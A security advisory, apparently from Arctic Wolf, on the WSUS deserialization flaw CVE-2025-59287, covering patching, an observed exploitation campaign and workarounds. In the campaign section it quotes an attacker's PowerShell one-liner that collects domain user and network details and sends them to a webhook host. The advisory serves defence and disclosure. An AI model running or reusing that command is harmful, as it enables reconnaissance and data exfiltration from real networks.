On October 23, 2025, Microsoft took decisive action by releasing an out-of-band security update addressing a critical vulnerability identified as CVE-2025-59287. This flaw, which arises from the deserialization of untrusted data within Windows Server Update Services (WSUS), poses a significant risk as it allows remote, unauthenticated attackers to execute arbitrary code by sending a specially crafted event. Notably, only Windows servers with the WSUS Server Role enabled are susceptible to this vulnerability, a feature that is not activated by default.
Although CVE-2025-59287 was initially addressed in the October Patch Tuesday update, Microsoft has acknowledged that the original patch was insufficient. The latest update is essential for fully mitigating the vulnerability. Following the release of this patch, threat actors have begun exploiting the vulnerability, leading to its inclusion in CISA’s Known Exploited Vulnerabilities Catalog. Furthermore, technical details and proof-of-concept exploits for CVE-2025-59287 have become publicly available.
Threat Activity Targeting WSUS Servers
Arctic Wolf has been monitoring a threat campaign specifically targeting WSUS servers through ports 8530 and 8531. While it remains unclear if this campaign is directly linked to CVE-2025-59287, the nature of the incidents is concerning. In these occurrences, a malicious PowerShell script is executed within a cmd process initiated by the IIS worker process, w3wp.exe, or wsusservice.exe. The injected command performs operations such as net user /domain and ipconfig /all, with the output redirected to a domain controlled by an attacker.
try{$r= (&{echo https://REDACTEDIP:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$.ToString()} ;$w=”http://webhook[.]site/REDACTED”;try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl[.]exe -k $w –data-binary $r}
Arctic Wolf has established Managed Detection and Response coverage for the activities identified in this campaign and will continue to alert customers about new developments as they arise.
After assessing its own environment for potential impacts from this vulnerability, Arctic Wolf has determined that it is not affected.
Recommendations
Upgrade to Latest Fixed Versions
Arctic Wolf strongly advises customers to upgrade to the latest fixed versions of Windows Server to effectively mitigate CVE-2025-59287, as recommended by Microsoft.
Install Arctic Wolf Agent & Sysmon
The installation of the Arctic Wolf Agent and Sysmon is crucial for providing visibility into events necessary to identify activities related to this campaign.
- For detailed instructions on installing the Arctic Wolf Agent, please refer to the installation guides provided below.
- If a supported EDR solution is already deployed in your environment, ensure it is configured for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends adhering to change management best practices when deploying the Agent and Sysmon, including testing changes in a controlled environment prior to production deployment.
Workaround (Optional)
For users unable to apply the October 23, 2025, out-of-band update immediately, Microsoft has outlined several mitigations to consider until the update can be implemented:
- Since only Windows servers with the WSUS Server Role enabled are vulnerable to CVE-2025-59287, disabling WSUS will effectively mitigate the risk. However, be aware that clients will not receive updates from the server if WSUS is disabled.
- To render WSUS non-operational, block inbound traffic to ports 8530 and 8531 on the host firewall, rather than solely at the network or perimeter firewall.
